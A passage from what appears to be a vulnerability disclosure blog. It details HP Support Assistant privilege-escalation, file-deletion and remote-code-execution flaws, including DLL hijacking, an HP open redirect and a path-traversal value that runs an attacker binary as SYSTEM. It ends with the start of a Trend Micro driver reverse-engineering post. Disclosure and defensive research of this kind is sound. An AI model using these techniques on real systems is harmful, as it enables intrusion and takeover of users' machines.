Path.Combine is significantly safer than just adding two path strings because it checks for invalid characters and will throw an exception if one is detected, halting most path manipulation attacks.

Several Critical Vulnerabilities on most HP machines running Windows

What this means for us as an attacker is that our ExecutableName property cannot escape the C:\Windows\TEMP directory, because / is one of the blacklisted characters.

This isn’t a problem, because unprivileged processes CAN write directly to C:\Windows\TEMP. This means we can place a binary to run right into the TEMP directory and have this method eventually execute it. Here’s the small issue with that, the HP Certificate check.

How do we get past that? We can place a legitimate HP binary into the temporary directory for execution, but we need to somehow hijack its context. In the beginning of this report, we outlined how we can enter the context of a signed HP binary by injecting into it, this isn’t exactly possible here because the service is the one creating the process. What we CAN do is some simple DLL Hijacking.

DLL Hijacking means we place a dynamically loaded library that is imported by the binary into the current directory of the signed binary. One of the first locations Windows searches when loading a dynamically linked library is the current directory. When the signed binary attempts to load that library, it will load our malicious DLL and give us the ability to execute in its context.

I picked at random from the abundant supply of signed HP binaries. For this attack, I went with HPWPD.exe which is HP’s "Web Products Detection" binary. A simple way to find a candidate DLL to hijack is by finding the libraries that are missing. How do we find "missing" dynamically loaded libraries? Procmon to the rescue!

Using three simple filters and then running the binary, we’re able to easily determine a missing library.

Several Critical Vulnerabilities on most HP machines running Windows
Several Critical Vulnerabilities on most HP machines running Windows

Now we have a few candidates here. C:\VM is the directory where the binary resides on my test virtual machine. Since the first path is not in the current directory, we can disregard that. From there on, we can see plenty of options. Each one of those CreateFile operations usually mean that the binary was attempting to load a dynamically linked library and was checking the current directory for it. For attacking purposes, I went with RichEd20.dll just because it's the first one I saw.

To perform this Local Privilege Escalation attack, all we have to do is write a malicious DLL, name it RichEd20.dll, and stick it with the binary in C:\Windows\TEMP. Once we call the direct install method passing the HPWPD.exe binary as the ExecutableName property, the method will start it as the SYSTEM user and then the binary will load our malicious DLL escalating our privileges.

Discovery: Local Privilege Escalation #4

The next protected service method to look at is DownloadSoftPaq.

To start with, this method takes in an action item base, a String parameter called MD5URL, and a Boolean indicating whether or not this is a manual installation. As an attacker, we control all three of these parameters.

Several Critical Vulnerabilities on most HP machines running Windows

If we pass in true for the parameter isManualInstall AND the action item base property UrlResultUI is not empty, we’ll use this as the download URL. Otherwise, we’ll use the action item base property UrlResult as the download URL. If the download URL does not start with http, the method will force the download URL to be http://.

Several Critical Vulnerabilities on most HP machines running Windows

This is an interesting check. The method will make sure that the Host of the specified download URL ends with either .hp.com OR .hpicorp.net. If this Boolean is false, the download will not continue.

Another check is making a HEAD request to the download URL and ensuring the response header Content-Length is greater than 0. If an invalid content length header is returned, the download won’t continue.

The location of the download is the combination of C:\Windows\TEMP and the action item base ExecutableName property. The method does not use safe path concatenation and instead uses raw string concatenation. After verifying that there is internet connection, the content length of the download URL is greater than 0, and the URL is "valid", the download is initiated.

If the action item base ActionType property is equal to "PrinterDriver", the method makes sure the downloaded file’s MD5 hash equals that specified in the CheckSum property or the one obtained from HP’s CDN server.

Several Critical Vulnerabilities on most HP machines running Windows
Several Critical Vulnerabilities on most HP machines running Windows

After the file has completed downloading, the final verification step is done. The VerifyDownloadSignature method will check if the downloaded file is signed. If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

Exploitation: Local Privilege Escalation #4

Let’s say I wanted to abuse DownloadSoftPaq to download my file to anywhere in the system, how could I do this?

Let’s take things one at a time, starting with the first challenge, the download URL. Now the only real check done on this URL is making sure the host of the URL http://[this part]/something ENDS with .hp.com or .hpicorp.net. As seen in the screenshot of this check above, the method takes the safe approach of using C#’s URI class and grabbing the host from there instead of trying to parse it out itself. This means unless we can find a "zero day" in C#’s parsing of host names, we’ll need to approach the problem a different way.

Okay, so our download URL really does need to end with an HP domain. DNS Hijacking could be an option, but since we’re going after a Local Privilege Escalation bug, that would be pretty lame. How about this… C# automatically follows redirects, so what if we found an open redirect bug in any of the million HP websites? Time to use one of my "tricks" of getting a web bug primitive.

Sometimes I need a basic exploit primitive like an open redirect vulnerability or a cross site scripting vulnerability but I’m not really in the mood to pentest, what can I do? Let me introduce you to a best friend for an attacker, "OpenBugBounty"! OpenBugBounty is a site where random researchers can submit web bugs about any website. OpenBugBounty will take these reports and attempt to email several security emails at the vulnerable domain to report the issue. After 90 days from the date of submission, these reports are made public.

So I need an open redirect primitive, how can I use OpenBugBounty to find one? Google it!

Several Critical Vulnerabilities on most HP machines running Windows

Nice, we got a few options, let’s look at the first one.

Several Critical Vulnerabilities on most HP machines running Windows

An unpatched bug, just what we wanted. We can test the open redirect vulnerability by going to a URL like https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com and landing on Google, thanks TvM and HP negligence (it's been 5 months since I re-reported this open redirect bug and it's still unpatched)!

Back to the method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where the file is stored to make the method download any file we want.

The next barrier is being able to place the file where we want. This is pretty simple, because HP didn’t do safe path string concatenation. We can just set the action item base ExecutableName property to be a relative path such as ../../something allowing us to easily control the download location.

We don’t have to worry about MD5 verification if we just pass something other than "PrinterDriver" for the ActionType property.

The final check is the verification of the downloaded file’s signature. Let’s quickly look review the method.

Several Critical Vulnerabilities on most HP machines running Windows
Several Critical Vulnerabilities on most HP machines running Windows
If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

The shouldDelete argument is the first argument passed to the VerifyDownloadSignature method. I didn’t want to spoil it in discovery, but this is hilarious because as you can see in the picture above, the first argument to VerifyDownloadSignature is always false. This means that even if the downloaded file fails signature verification, since shouldDelete is always false, the file won’t be deleted. I really don’t know how to explain this one… did an HP Developer just have a brain fart? Whatever the reason, it made my life a whole lot easier.

At the end of the day, we can place any file anywhere we want in the context of a SYSTEM process allowing for escalation of privileges.

Discovery: Local Privilege Escalation #5

The next protected method we’ll be looking at is CreateInstantTask. For our purposes, this is a pretty simple function to review.

The method takes in three arguments. The String parameter updatePath which represents the path to the update binary, the name of the update, and the arguments to pass to the update binary.

The first verification step is checking the path of the update binary.

Several Critical Vulnerabilities on most HP machines running Windows

This verification method will first ensure that the update path is an absolute path that does not lead to a junction or reparse point. Good job on HP for checking this.

The next check is that the update path "starts with" a whitelisted base path. For my 64-bit machine, MainAppPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Framework and FrameworkPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Solutions.

What this check essentially means is that since our path has to be absolute AND it must start with a path to HP’s Program Files directory. The update path must actually be in their installation folder.

The final verification step is ensuring that the update path points to a binary signed by HP.

If all of these checks pass, the method creates a Task Scheduler task to be executed immediately by an Administrator. If any Administrator is logged on, the binary is immediately executed.

Exploitation: Local Privilege Escalation #5

A tricky one. Our update path must be something in HP’s folders, but what could that be? This stumped me for a while, but I got a spark of an idea while brainstorming.

We have the ability to start ANY program in HP’s installation folder with ANY arguments, interesting. What types of binaries does HP’s installation folders have? Are any of them interesting?

I found a few interesting binaries in the whitelisted directories such as Extract.exe and unzip.exe. On older versions, we could use unzip.exe, but a new update implements a signature check. Extract.exe didn’t even work when I tried to use it normally. I peeked at several binaries in dnSpy and I found an interesting one, HPSF_Utils.exe.

When the binary was started with the argument "encrypt" or "decrypt", the method below would be executed.

Several Critical Vulnerabilities on most HP machines running Windows

If we passed "encrypt" as the first argument, the method would take the second argument, read it in and encrypt it, then write it to the file specified at the third argument. If we passed "decrypt", it would do the same thing except read in an encrypted file and write the decrypted version to the third argument path.

If you haven’t caught on to why this is useful, the reason it’s so useful is because we can abuse the decrypt functionality to write our malicious file to anywhere in the system, easily allowing us to escalate privileges. Since this binary is in the whitelisted path, we can execute it and abuse it to gain Administrator because we can write anything to anywhere.

Arbitrary File Deletion Vulnerabilities

Discovery: Arbitrary File Deletion

Let’s start with some arbitrary file deletion vulnerabilities. Although file deletion probably won’t lead to Local Privilege Escalation, I felt that it was serious enough to report because I could seriously mess up a victim’s machine by abusing HP’s software.

The protected method we’ll be looking at is LogSoftPaqResults. This method is very short for our purposes, all we need to read are the first few lines.

Several Critical Vulnerabilities on most HP machines running Windows

When the method is called, it will combine the temporary path C:\Windows\TEMP and the ExecutableName from the untrusted action item base using an unsafe string concatenation. If the file at this path exists AND it is not signed by HP, it will go ahead and delete it.

Exploitation: Arbitrary File Deletion #1

This is a pretty simple bug. Since HP uses unsafe string concatenation on path strings, we can just escape out of the C:\Windows\TEMP directory via relative path escapes (i.e ../) to reach any file we want.

If that file exists and isn’t signed by HP, the method which is running in the context of a SYSTEM process will delete that file. This is pretty serious because imagine if I ran this on the entirety of your system32 folder. That would definitely not be good for your computer.

Exploitation: Arbitrary File Deletion #2

This bug was even simpler than the last one, so I decided not to create a dedicated discovery section. Let’s jump into the past and look at the protected method UncompressCabFile.
When the method starts, as we reviewed before, the following is checked:

  1. cabFilePath (path to the cabinet file to extract) exists.
  2. cabFilePath is signed by HP.
  3. Our token is "trusted" and the cabFilePath contains a few pre-defined paths.

If these conditions are not met, the method will delete the file specified by cabFilePath.

If we want to delete a file, all we need to do is specify pretty much any path in the cabFilePath argument and let the method delete it while running as the SYSTEM user.

Remote Code Execution Vulnerability

Discovery

For most of this report we’ve reviewed vulnerabilities inside the HP service. In this section, we’ll explore a different HP binary. The methods reviewed in "General Exploitation" will not apply to this bug.

When I was looking for attack surfaces for Remote Code Execution, one of the first things I checked was for registered URL Protocols. Although I could find these manually in regedit, I opted to use the tool URLProtocolView. This neat tool will allow us to easily enumerate the existing registered URL Protocols and what command line they execute.

Scrolling down to "hp" after sorting by name showed quite a few options.

Several Critical Vulnerabilities on most HP machines running Windows

The first one looked mildly interesting because the product name of the binary was "HP Download and Install Assistant", could this assist me in achieving Remote Code Execution? Let’s pop it open in dnSpy.

The first thing the program does is throw the passed command line arguments into its custom argument parser. Here are the arguments we can pass into this program:

  1. remotefile = The URL of a remote file to download.
  2. filetitle = The name of the file downloaded.
  3. source = The "launch point" or the source of the launch.
  4. caller = The calling process name.
  5. cc = The country used for localization.
  6. lc = The language used for localization.

After parsing out the arguments, the program starts creating a "download request". The method will read the download history to see if the file was already downloaded. If it wasn’t downloaded before, the method adds the download request into the download requests XML file.

After creating the request, the program will "process" the XML data from the history file. For every pending download request, the method will create a downloader.

During this creation is when the first integrity checks are done. The constructor for the downloader first extracts the filename specified in the remotefile argument. It parses the name out by finding the last index of the character / in the remotefile argument and then taking the substring starting from that index to the end of the string. For example, if we passed in https://example.com/test.txt for the remote file, the method would parse out text.txt.

If the file name contains a period, verification on the extension begins. First, the method parses the file extension by getting everything after the last period in the name. If the extension is exe, msi, msp, msu, or p2 then the download is marked as an installer. Otherwise, the extension must be one of 70 other whitelisted extensions. If the extension is not one of those, the download is cancelled.

After verifying the file extension, the complete file path is created.

Several Critical Vulnerabilities on most HP machines running Windows

First, if the lc argument is ar (Arabic), he (Hebrew), ru (Russian), zh (Chinese), ko (Korean), th (Thai), or ja (Japanese), your file name is just the name extracted from the URL. Otherwise, your file name is the filetitle argument, , and the file name from the URL combined. Finally, the method will replace any invalid characters present in Path.GetInvalidFileNameChars with a space.

This sanitized file name is then combined with the current user's download folder + HP Downloads.

The next relevant step is for the download to begin, this is where the second integrity check is. First, the remote file URL argument must begin with https. Next, a URI object is created for the remote file URL. The host of this URI must end with .hp.com or end with .hpicorp.net. Only if these checks are passed is the download started.

Once the download has finished, another check is done. Before the download is marked as downloaded, the program verifies the downloaded content. This is done by first checking if the download is an installer, which was set during the file name parsing stage. If the download is an installer then the method will verify the certificate of the downloaded file. If the file is not an installer, no check is done.

Several Critical Vulnerabilities on most HP machines running Windows

The first step of verifying the certificate of the file is to check that it matches the binary. The method does this by calling WinVerifyTrust on the binary. The method does not care if the certificate is revoked. The next check is extracting the subject of the certificate. This subject field must contain in any case hewlett-packard, hewlett packard, or o=hp inc.

When the client presses the open or install button on the form, this same check is done again, and then the file is started using C#’s Process.Start. There are no arguments passed.

Exploitation

There are several ways to approaching exploiting this program. In the next sections, I’ll be showing different variants of attacking and the pros/cons of each one. Let’s start by bypassing a check we need to get past for any variant, the URL check.

As we just reviewed, the remote URL passed must have a host that ends with .hp.com or .hpicorp.net. This is tricky because the verification method uses the safe and secure way of verifying the URL’s host by first using C#’s URI parser. Our host will really need to contain .hp.com or .hpicorp.net.

A previous vulnerability in this report had the same issue. If you haven't read that section, I would highly recommend it to understand where we got this magical open redirect vulnerability in one of HP's websites: https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com.

Back to the verification method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where we can host any file we want.

This sums up the "general" exploitation portion of the Remote Code Execution bugs. Let’s get into the individual ones.

Remote Code Execution Variant #1

The first way I would approach this seeing what type of file we can have our victim download without the HP program thinking it’s an installer. Only if it’s an installer will the program verify its signature.

Looking at the whitelisted file extensions, we don’t have that much to work with, but we have some options. One whitelisted option is zip, this could work. An ideal attack scenario would be a website telling you need a critical update, the downloader suddenly popping up with the HP logo, the victim pressing open on the zip file and executing a binary inside it.

To have a valid remote file URL, we will need to abuse the open redirect bug. I put my bad file on my web server and just put the URL to the zip file at the end of the open redirect URL.

When the victim visits my malicious website, an iframe with the hpdia:// URL Protocol is loaded and the download begins.

This attack is somewhat lame because it requires two clicks to RCE, but I still think it’s more than a valid attack method since the HP downloader looks pretty legit.

Remote Code Execution Variant #2

My next approach is definitely more interesting then the last. In this method, we first make the program download a DLL file which is NOT an installer, then we install a signed HP binary who depends on this DLL.

Similar to our DLL Hijacking attack in the third Local Privilege Escalation vulnerability, we can use any signed binary which imports a DLL that doesn’t exist. By simply naming our malicious DLL to the missing DLL name, the executed signed program will end up loading our malicious DLL giving us Remote Code Execution.

Here’s the catch. We’re going to have to set the language of the downloader to Arabic, Hebrew, Russian, Chinese, Korean, Thai, or Japanese. The reason is for DLL Hijacking, we need to set our malicious DLL name to exactly that of the missing DLL.

Several Critical Vulnerabilities on most HP machines running Windows

If you recall the CreateLocalFilename method, the actual filename will have in it if the language we pass in through arguments is not one of those languages. If we do pass in a language that’s one of the ones checked for in the function above, the filename will be the filename specified in the remote URL.

If your target victim is in a country where one of these languages is spoken commonly, this is in my opinion the best attack route. Otherwise, it may be a bit of an optimistic approach.

Whenever the victim presses on any of the open or install all buttons, the signed binary will start and load our malicious DLL. If your victim is in an English country or only speaks English, this may be a little more difficult.

You could have the website present a critical update guide telling the visitor what button to press to update their system, but I am not sure if a user is more likely to press a button in a foreign language or open a file in a zip they opened.

At the end of the day, this is a one click only attack method, and it would work phenomenal in a country that uses the mentioned languages. This variant can also be used after detecting the victim’s language and seeing if it’s one of the few languages we can use with this variant. You can see the victim’s language in HTTP headers or just the "navigator language" in javascript.

Remote Code Execution Variant #3

The last variant for achieving remote code execution is a bit optimistic in how much resources the attacker has, but I don’t think it a significant barrier for an APT.

To review, if the extension of the file we’re downloading is considered an installer (see installer extensions in discovery), our binary will be checked for HP’s signature. Let’s take a look at the signature check.

Several Critical Vulnerabilities on most HP machines running Windows

The method takes in a file name and first verifies that it’s a valid certificate. This means a certificate ripped from a legitimate HP binary won’t work because it won’t match the binary. The concerning part is the check for if the certificate is an HP certificate.

To be considered an HP certificate, the subject of the certificate must contain in any case hewlett-packard, hewlett packard, or o=hp inc. This is a pretty inadequate check, especially that lower case conversion. Here are a few example companies I can form that would pass this check:

  1. [something]hewlett PackArd[someting]
  2. HP Inc[something]

I could probably spend days making up company names. All an attacker needs to do is create an organization that contains any of those words and they can get a certificate for that company. Next thing you know, they can have a one click RCE for anyone that has the HP bloatware installed.

Proof of Concept

Local Privilege Escalation Vulnerabilities

Remote Code Execution Vulnerabilities

"Remediation"

HP had their initial patch finished three months after I sent them the report of my findings. When I first heard they were aiming to patch 10 vulnerabilities in such a reasonable time-frame, I was impressed because it appeared like they were being a responsible organization who took security vulnerabilities seriously. This was in contrast to the performance I saw last year with my research into Remote Code Execution in Dell's bloatware where they took 6 months to deliver a patch for a single vulnerability, an absurd amount of time.

In the following section, I'll be going over the vulnerabilities HP did not patch or patched inadequately. Here is an overview of what was actually patched:

  1. Local Privilege Escalation #1 – Patched ✔️
  2. Local Privilege Escalation #2 – Unpatched ❌
  3. Local Privilege Escalation #3 – Unpatched ❌
  4. Local Privilege Escalation #4 – "Patched" 😕 (not really)
  5. Local Privilege Escalation #5 – Unpatched ❌
  6. Arbitrary File Deletion #1 – Patched ✔️
  7. Arbitrary File Deletion #2 – Patched ✔️
  8. Remote Code Execution Variant #1 – Patched ✔️
  9. Remote Code Execution Variant #2 – Patched ✔️
  10. Remote Code Execution Variant #3 – Patched ✔️

Re-Discovery

New Patch, New Vulnerability

The largest change observed is the transition from the hardcoded "C:\Windows\TEMP" temporary directory to relying on the action item base supplied by the client to specify the temporary directory.

I am not sure if HP PSIRT did not review the patch or if HP has a lack of code review in general, but this transition actually introduced a new vulnerability. Now, instead of having a trusted hardcoded string be the deciding factor for the temporary directory… HP relies on untrusted client data (the action item base).

As an attacker, my unprivileged process is what decides the value of the temporary directory used by the elevated agent, not the privileged service process, allowing for simple spoofing. This was one of the more shocking components of the patch. HP had not only left some vulnerabilities unpatched but in doing so ended up making some code worse than it was. This change mostly impacted the Local Privilege Escalation vulnerabilities.

Local Privilege Escalation #2

Looking over the new InstallSoftpaqsSilently method, the primary changes are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. There is more insecure path concatenation (path1 + path2 versus C#’s Path.Combine).
  3. There is more verification on the path specified by the temporary directory and executable name (i.e checking for relative path escapes, NTFS reparse points, rooted path, etc).

The core problems that are persistent even after patching:

  1. The path that is executed by the method still utilizes unvalidated untrusted client input. Specifically, the method splits the item property SilentInstallString by double quote and utilizes values from that array for the name of the binary. This binary name is not validated besides a simple check to see if the file exists. No guarantees it isn’t an attacker’s binary.
  2. There is continued use of insecure coding practices involving paths. For example, HP consistently concatenates paths by using the string combination operator versus using a secure concatenation method such as Path.Combine.

In order to have a successful call to InstallSoftpaqsSilently, you must now meet these requirements:

  1. The file specified by the TempDirectory property + ExecutableName property must exist.
  2. The file specified by TempDirectory property + ExecutableName property must be signed by HP.
  3. The path specified by TempDirectory property + ExecutableName property must pass the VerifyHPPath requirements:
    a. The path cannot contain relative path escapes.
    b. The path must be a rooted path.
    c. The path must not be a junction point.
    d. The path must start with HP path.
  4. The SilentInstallString property must contain the SPName property + .exe.
  5. The directory name is the TempDirectory property + swsetup\ + the ExecutableName property with .exe stripped.
  6. The Executable Name is specified in the SilentInstallString property split by double quote. If the split has a size greater than 1, it will take the second element as EXE Name, else the first element.
  7. The Executable Name must not contain .exe or .msi, otherwise, the Directory Name + \ + the Executable Name must exist.
  8. The function executes the binary specified at Directory Name + \ + Executable Name.

The core point of attack is outlined in step 6 and 7. We can control the Executable Name by formulating a malicious payload for the SilentInstallString item property that escapes a legitimate directory passed in the TempDirectory property into an attacker controlled directory.

For example, if we pass:

  1. C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\ for the TempDirectory property.
  2. HPSF.exe for the the ExecutableName property.
  3. malware for the SPName property.
  4. "..\..\..\..\..\Malware\malware.exe (quote at beginning intentional) for the SilentInstallString property.

The service will execute the binary at C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\swsetup\HPSF\..\..\..\..\..\Malware\malware.exe which ends up resolving to C:\Malware\malware.exe thus executing the attacker controlled binary as SYSTEM.

Local Privilege Escalation #3

The primary changes for the new InstallSoftpaqsDirectly method are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. Invalid binaries are no longer deleted.

The only thing we need to change in our proof of concept is to provide our own TempDirectory path. That’s… it.

Local Privilege Escalation #4

For the new DownloadSoftpaq method, the primary changes are:

  1. The download URL cannot have query parameters.

The core problems that are persistent even after patching:

  1. Insecure validation of the download URL.
  2. Insecure validation of the downloaded binary.
  3. Open Redirect bug on ers.rssx.hp.com.

First of all, HP still only does a basic check on the hostname to ensure it ends with a whitelisted host, however, this does not address the core issue that this check in itself is insecure.

Simply checking hostname exposes attacks from Man-in-the-Middle attacks, other Open Redirect vulnerabilities, and virtual host based attacks (i.e a subdomain that redirects to 127.0.0.1).

For an unknown reason, HP still does not delete the binary downloaded if it does not have an HP signature because HP passes the constant false for the parameter that indicates whether or not to delete a bad binary.

At the end of the day, this is still a patched vulnerability since at this time you can’t quite exploit it, but I wouldn’t be surprised to see this exploited in the future.

Local Privilege Escalation #5

This vulnerability was completed untouched. Not much more to say about it.

Timeline

Here is a timeline of HP's response:

10/05/2019 - Initial report of vulnerabilities sent to HP.
10/08/2019 - HP PSIRT acknowledges receipt and creates a case.
12/19/2019 - HP PSIRT pushes an update and claims to have "resolved the issues reported".
01/01/2020 - Updated report of unpatched vulnerabilities sent to HP.
01/06/2020 - HP PSIRT acknowledges receipt.
02/05/2020 - HP PSIRT schedules a new patch for the first week of March.
03/09/2020 - HP PSIRT pushes the scheduled patch to 03/21/2020 due to Novel Coronavirus complications.

Protecting your machine

If you're wondering what you need to do to ensure your HP machine is safe from these vulnerabilities, it is critical to ensure that it is up to date or removed. By default, HP Support Assistant does not have automatic updating by default unless you explicitly opt-in (HP claims otherwise).

It is important to note that because HP has not patched three local privilege escalation vulnerabilities, even if you have the latest version of the software, you are still vulnerable unless you completely remove the agent from your machine (Option 1).

Option 1: Uninstall

The best mitigation to protect against the attacks described in this article and future vulnerabilities is to remove the software entirely. This may not be an option for everyone, especially if you rely on the updating functionality the software provides, however, removing the software ensures that you're safe from any other vulnerabilities that may exist in the application.

For most Windows installations, you can use the "Add or remove programs" component of the Windows control panel to uninstall the service. There are two pieces of software to uninstall, one is called "HP Support Assistant" and the other is called "HP Support Solutions Framework".

Option 2: Update

The next best option is to update the agent to the latest version. The latest update fixes several vulnerabilities discussed except for three local privilege escalation vulnerabilities.

There are two ways to update the application, the recommended method is by opening "HP Support Assistant" from the Start menu, click "About" in the top right, and pressing "Check for latest version". Another method of updating is to install the latest version from HP's website here.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

18 May 2020 at 15:32
How to use Trend Micro's Rootkit Remover to Install a Rootkit

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

For a recent project, I had to do research into methods rootkits are detected and the most effective measures to catch them when I asked the question, what are some existing solutions to rootkits and how do they function? My search eventually landed me on the TrendMicro RootkitBuster which describes itself as "A free tool that scans hidden files, registry entries, processes, drivers, and the master boot record (MBR) to identify and remove rootkits".

The features it boasted certainly caught my attention. They were claiming to detect several techniques rootkits use to burrow themselves into a machine, but how does it work under the hood and can we abuse it? I decided to find out by reverse engineering core components of the application itself, leading me down a rabbit hole of code that scarred me permanently, to say the least.

Discovery

Starting the adventure, launching the application resulted in a fancy warning by Process Hacker that a new driver had been installed.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Already off to a good start, we got a copy of Trend Micro's "common driver", this was definitely something to look into. Besides this driver being installed, this friendly window opened prompting me to accept Trend Micro's user agreement.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

I wasn't in the mood to sign away my soul to the devil just yet, especially since the terms included a clause stating "You agree not to attempt to reverse engineer, decompile, modify, translate, disassemble, discover the source code of, or create derivative works from...".

Thankfully, Trend Micro already deployed their software on to my machine before I accepted any terms. Funnily enough, when I tried to exit the process by right-clicking on the application and pressing "Close Window", it completely evaded the license agreement and went to the main screen of the scanner, even though I had selected the "I do not accept the terms of the license agreement" option. Thanks Trend Micro!

How to use Trend Micro's Rootkit Remover to Install a Rootkit

I noticed a quick command prompt flash when I started the application. It turns out this was the result of a 7-Zip Self Extracting binary which extracted the rest of the application components to %TEMP%\RootkitBuster.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Let's review the driver we'll be covering in this article.

  • The tmcomm driver which was labeled as the "TrendMicro Common Module" and "Trend Micro Eyes". A quick overlook of the driver indicated that it accepted communication from privileged user-mode applications and performed common actions that are not specific to the Rootkit Remover itself. This driver is not only used in the Rootkit Buster and is implemented throughout Trend Micro's product line.

In the following sections, we'll be deep diving into the tmcomm driver . We'll focus our research into finding different ways to abuse the driver's functionality, with the end goal being able to execute kernel code. I decided not to look into the tmrkb.sys because although I am sure it is vulnerable, it seems to only be used for the Rootkit Buster.

TrendMicro Common Module (tmcomm.sys)

Let's begin our adventure with the base driver that appears to be used not only for this Rootkit Remover utility, but several other Trend Micro products as well. As I stated in the previous section, a very brief look-over of the driver revealed that it does allow for communication from privileged user-mode applications.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

One of the first actions the driver takes is to create a device to accept IOCTL communication from user-mode. The driver creates a device at the path \Device\TmComm and a symbolic link to the device at \DosDevices\TmComm (accessible via \\.\Global\TmComm). The driver entrypoint initializes a significant amount of classes and structure used throughout the driver, however, for our purposes, it is not necessary to cover each one.

I was happy to see that Trend Micro made the correct decision of restricting their device to the SYSTEM user and Administrators. This meant that even if we did find exploitable code, because any communication would require at least Administrative privileges, a significant amount of the industry would not consider it a vulnerability. For example, Microsoft themselves do not consider Administrator to Kernel to be a security boundary because of the significant amount of access they get. This does not mean however exploitable code in Trend Micro's drivers won't be useful.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

TrueApi

A large component of the driver is its "TrueApi" class which is instantiated during the driver's entrypoint. The class contains pointers to imported functions that get used throughout the driver. Here is a reversed structure:

struct TrueApi
{
	BYTE Initialized;
	PVOID ZwQuerySystemInformation;
	PVOID ZwCreateFile;
	PVOID unk1; // Initialized as NULL.
	PVOID ZwQueryDirectoryFile;
	PVOID ZwClose;
	PVOID ZwOpenDirectoryObjectWrapper;
	PVOID ZwQueryDirectoryObject;
	PVOID ZwDuplicateObject;
	PVOID unk2; // Initialized as NULL.
	PVOID ZwOpenKey;
	PVOID ZwEnumerateKey;
	PVOID ZwEnumerateValueKey;
	PVOID ZwCreateKey;
	PVOID ZwQueryValueKey;
	PVOID ZwQueryKey;
	PVOID ZwDeleteKey;
	PVOID ZwTerminateProcess;
	PVOID ZwOpenProcess;
	PVOID ZwSetValueKey;
	PVOID ZwDeleteValueKey;
	PVOID ZwCreateSection;
	PVOID ZwQueryInformationFile;
	PVOID ZwSetInformationFile;
	PVOID ZwMapViewOfSection;
	PVOID ZwUnmapViewOfSection;
	PVOID ZwReadFile;
	PVOID ZwWriteFile;
	PVOID ZwQuerySecurityObject;
	PVOID unk3; // Initialized as NULL.
	PVOID unk4; // Initialized as NULL.
	PVOID ZwSetSecurityObject;
};

Looking at the code, the TrueApi is primarily used as an alternative to calling the functions directly. My educated guess is that Trend Micro is caching these imported functions at initialization to evade delayed IAT hooks. Since the TrueApi is resolved by looking at the import table however, if there is a rootkit that hooks the IAT on driver load, this mechanism is useless.

XrayApi

Similar to the TrueApi, the XrayApi is another major class in the driver. This class is used to access several low-level devices and to interact directly with the filesystem. A major component of the XrayConfig is its "config". Here is a partially reverse-engineered structure representing the config data:

struct XrayConfigData
{
	WORD Size;
	CHAR pad1[2];
	DWORD SystemBuildNumber;
	DWORD UnkOffset1;
	DWORD UnkOffset2;
	DWORD UnkOffset3;
	CHAR pad2[4];
	PVOID NotificationEntryIdentifier;
	PVOID NtoskrnlBase;
	PVOID IopRootDeviceNode;
	PVOID PpDevNodeLockTree;
	PVOID ExInitializeNPagedLookasideListInternal;
	PVOID ExDeleteNPagedLookasideList;
	CHAR unkpad3[16];
	PVOID KeAcquireInStackQueuedSpinLockAtDpcLevel;
	PVOID KeReleaseInStackQueuedSpinLockFromDpcLevel;
	...
};

The config data stores the location of internal/undocumented variables in the Windows Kernel such as the IopRootDeviceNode, PpDevNodeLockTree, ExInitializeNPagedLookasideListInternal, and ExDeleteNPagedLookasideList.  My educated guess for the purpose of this class is to access low-level devices directly rather than use documented methods which could be hijacked.

IOCTL Requests

Before we get into what the driver allows us to do, we need to understand how IOCTL requests are handled.

In the primary dispatch function, the Trend Micro driver converts the data alongside a IRP_MJ_DEVICE_CONTROL request to a proprietary structure I call a TmIoctlRequest.

struct TmIoctlRequest
{
	DWORD InputSize;
	DWORD OutputSize;
	PVOID UserInputBuffer;
	PVOID UserOutputBuffer;
	PVOID Unused;
	DWORD_PTR* BytesWritten;
};

The way Trend Micro organized dispatching of IOCTL requests is by having several "dispatch tables". The "base dispatch table" simply contains an IOCTL Code and a corresponding "sub dispatch function". For example, when you send an IOCTL request with the code 0xDEADBEEF, it will compare each entry of this base dispatch table and pass along the data if there is a table entry that has the matching code. A base table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *DispatchFunction_t)(TmIoctlRequest *IoctlRequest);

struct BaseDispatchTableEntry
{
	DWORD_PTR IOCode;
	DispatchFunction_t DispatchFunction;
};

After the DispatchFunction is called, it typically verifies some of the data provided ranging from basic nullptr checks to checking the size of the input and out buffers. These "sub dispatch functions" then do another lookup based on a code passed in the user input buffer to find the corresponding "sub table entry". A sub table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *OperationFunction_t)(PVOID InputBuffer, PVOID OutputBuffer);

struct SubDispatchTableEntry
{
	DWORD64 OperationCode;
	OperationFunction_t PrimaryRoutine;
	OperationFunction_t ValidatorRoutine;
};

Before calling the PrimaryRoutine, which actually performs the requested action, the sub dispatch function calls the ValidatorRoutine. This routine does "action-specific" validation on the input buffer, meaning that it performs checks on the data the PrimaryRoutine will be using. Only if the ValidatorRoutine returns successfully will the PrimaryRoutine be called.

Now that we have a basic understanding of how IOCTL requests are handled, let's explore what they allow us to do. Referring back to the definition of the "base dispatch table", which stores "sub dispatch functions", let's explore each base table entry and figure out what each sub dispatch table allows us to do!

IoControlCode == 9000402Bh

Discovery

This first dispatch table appears to interact with the filesystem, but what does that actually mean? To start things off, the code for the "sub dispatch table" entry is obtained by dereferencing a DWORD from the start of the input buffer. This means that to specify which sub dispatch entry you'd like to execute, you simply need to set a DWORD at the base of the input buffer to correspond with that entries' **OperationCode**.

